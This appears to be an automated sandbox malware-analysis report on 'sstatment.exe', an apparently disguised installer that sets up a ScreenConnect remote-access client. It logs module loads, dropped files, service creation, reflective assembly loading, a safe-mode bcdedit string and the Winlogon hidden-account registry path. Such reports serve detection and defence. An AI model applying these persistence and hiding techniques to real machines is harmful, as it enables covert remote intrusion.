                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: dpapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: wtsapi32.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: winsta.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: samcli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: samlib.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc6.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: version.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: version.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: wtsapi32.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: winsta.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: wkscli.dllJump to behavior
                              Source: C:\Users\user\Desktop\sstatment.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                              Source: C:\Users\user\Desktop\sstatment.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                              Source: sstatment.exeStatic PE information: certificate valid
                              Source: sstatment.exeStatic file information: File size 5652448 > 1048576
                              Source: sstatment.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x533200
                              Source: sstatment.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                              Source: sstatment.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                              Source: sstatment.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                              Source: sstatment.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                              Source: sstatment.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                              Source: sstatment.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                              Source: sstatment.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                              Source: sstatment.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1800250212.0000000001722000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbe source: ScreenConnect.WindowsClient.exe, 00000008.00000000.1751452083.0000000000B52000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdbM source: sstatment.exe
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientInstallerRunner\obj\Release\ScreenConnect.ClientInstallerRunner.pdb source: sstatment.exe
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdb source: sstatment.exe
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdbT source: Microsoft.Deployment.WindowsInstaller.dll.4.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.2.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller.Package\Microsoft.Deployment.WindowsInstaller.Package.pdb source: Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr
                              Source: Binary string: C:\Compile\screenconnect\Product\WindowsAuthenticationPackage\bin\Release\ScreenConnect.WindowsAuthenticationPackage.pdb source: ScreenConnect.ClientService.exe, 00000007.00000002.2964986924.00000000024E7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1808670263.0000000013180000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: sstatment.exe, ScreenConnect.Core.dll.4.dr, ScreenConnect.Core.dll.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: ScreenConnect.WindowsClient.exe, 00000008.00000002.2951121730.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1800702450.0000000001760000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1800903577.00000000017C2000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1801845823.0000000003171000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.dll.2.dr
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\DotNetResolver\obj\Debug\DotNetResolver.pdb source: sstatment.exe
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000007.00000000.1731372444.000000000055D000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: sstatment.exe, ScreenConnect.Windows.dll.2.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression.Cab\Microsoft.Deployment.Compression.Cab.pdb source: rundll32.exe, 00000004.00000003.1715220594.0000000004770000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1709027624.00000000048E4000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.4.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdb source: Microsoft.Deployment.WindowsInstaller.dll.4.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression\Microsoft.Deployment.Compression.pdb source: rundll32.exe, 00000004.00000003.1709027624.0000000004875000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.dll.4.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: sstatment.exe, 5e3178.msi.2.dr, MSI3407.tmp.2.dr, 5e3177.rbs.2.dr, 5e3176.msi.2.dr, MSI367A.tmp.2.dr, setup.msi.0.dr, MSI3417.tmp.2.dr
                              Source: Binary string: screenconnect_windows_credential_provider.pdb source: ScreenConnect.ClientService.exe, 00000007.00000002.2964986924.00000000024E7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1808670263.0000000013180000.00000004.00000800.00020000.00000000.sdmp
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000008.00000000.1751452083.0000000000B52000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\InstallerActions\obj\Release\ScreenConnect.InstallerActions.pdb source: ScreenConnect.InstallerActions.dll.4.dr
                              Source: Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: sstatment.exe, 5e3178.msi.2.dr, 5e3176.msi.2.dr, MSI2C46.tmp.1.dr, setup.msi.0.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbW] source: sstatment.exe, ScreenConnect.Windows.dll.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1800250212.0000000001722000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.2.dr
                              Source: Binary string: screenconnect_windows_credential_provider.pdb' source: ScreenConnect.ClientService.exe, 00000007.00000002.2964986924.00000000024E7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1808670263.0000000013180000.00000004.00000800.00020000.00000000.sdmp
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb source: sstatment.exe
                              Source: sstatment.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                              Source: sstatment.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                              Source: sstatment.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                              Source: sstatment.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                              Source: sstatment.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                              Data Obfuscation

                              Source: 0.2.sstatment.exe.5050000.0.raw.unpack, Program.cs | .Net Code: Main System.Reflection.Assembly.Load(byte[])
                              Source: 0.0.sstatment.exe.f478f8.4.raw.unpack, Program.cs | .Net Code: Main System.Reflection.Assembly.Load(byte[])
                              Source: sstatment.exe | Static PE information: real checksum: 0x54fd91 should be: 0x564e09
                              Source: C:\Users\user\Desktop\sstatment.exe | Code function: 0_2_02AD6F00 push eax; mov dword ptr [esp], ecx | 0_2_02AD6F11
                              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_3_06DD6F78 push esp; iretd | 4_3_06DD7170
                              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_3_06DD71A1 push esp; iretd | 4_3_06DD7170
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Code function: 7_2_03C04300 push ecx; retn 0003h | 7_2_03C0430A
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Code function: 7_2_03C04315 push ecx; retn 0003h | 7_2_03C0431A
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Code function: 7_2_03C03A95 push eax; retn 0003h | 7_2_03C03A99
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Code function: 7_2_0535E042 pushad ; ret | 7_2_0535E053
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Code function: 7_2_05848F83 push 5F5E6D27h; ret | 7_2_05848F18
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Code function: 7_2_058457AF push es; retn 0003h | 7_2_0584578A
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Code function: 7_2_05848F50 push 5F5E6D27h; ret | 7_2_05848EE8
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Code function: 8_2_00007FFD9B725818 pushad ; retn 9B71h | 8_2_00007FFD9B725871
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Code function: 8_2_00007FFD9B722F3C pushfd ; iretd | 8_2_00007FFD9B722F3D
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Code function: 8_2_00007FFD9B727D94 push ss; iretd | 8_2_00007FFD9B727D95
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Code function: 9_2_00007FFD9B70203F push ds; iretd | 9_2_00007FFD9B702046

                              Persistence and Installation Behavior

                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log
                              Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\MSI2C46.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll
                              Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\MSI2C46.tmp-\Microsoft.Deployment.Compression.Cab.dll
                              Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\MSI2C46.tmp-\ScreenConnect.InstallerActions.dll
                              Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\MSI2C46.tmp-\ScreenConnect.Windows.dll
                              Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsAuthenticationPackage.dll
                              Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsFileManager.exe
                              Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dll
                              Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsCredentialProvider.dll
                              Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI367A.tmp
                              Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\MSI2C46.tmp-\ScreenConnect.Core.dll
                              Source: C:\Windows\SysWOW64\msiexec.exe File created: C:\Users\user\AppData\Local\Temp\MSI2C46.tmp
                              Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Windows.dll
                              Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\MSI2C46.tmp-\Microsoft.Deployment.Compression.dll
                              Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\MSI2C46.tmp-\Microsoft.Deployment.WindowsInstaller.dll
                              Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Core.dll
                              Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI3417.tmp
                              Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsBackstageShell.exe
                              Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dll
                              Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe
                              Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe
                              Source: ScreenConnect.ClientService.dll.2.dr Binary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (de5851ad6e374ce3)

                              Hooking and other Techniques for Hiding and Protection

                              Source: sstatment.exe, 00000000.00000002.1713238462.00000000052E0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: sstatment.exe, 00000000.00000000.1692726837.0000000000A16000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: rundll32.exe, 00000004.00000003.1709027624.00000000048F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.2951121730.0000000002E91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                              Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1800702450.0000000001760000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                              Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1800903577.00000000017C2000.00000002.00000001.01000000.0000000D.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                              Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1812679514.000000001BFC2000.00000002.00000001.01000000.0000000F.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1801845823.0000000003171000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                              Source: sstatment.exe String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: ScreenConnect.ClientService.dll.2.dr String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                              Source: ScreenConnect.Windows.dll.2.dr String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: C:\Users\user\Desktop\sstatment.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\sstatment.exe Memory allocated: 2A90000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\sstatment.exe Memory allocated: 2AF0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\sstatment.exe Memory allocated: 4AF0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\sstatment.exe Memory allocated: 6330000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\sstatment.exe Memory allocated: 5AC0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\sstatment.exe Memory allocated: 7330000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\sstatment.exe Memory allocated: 8330000 memory reserve | memory write watch
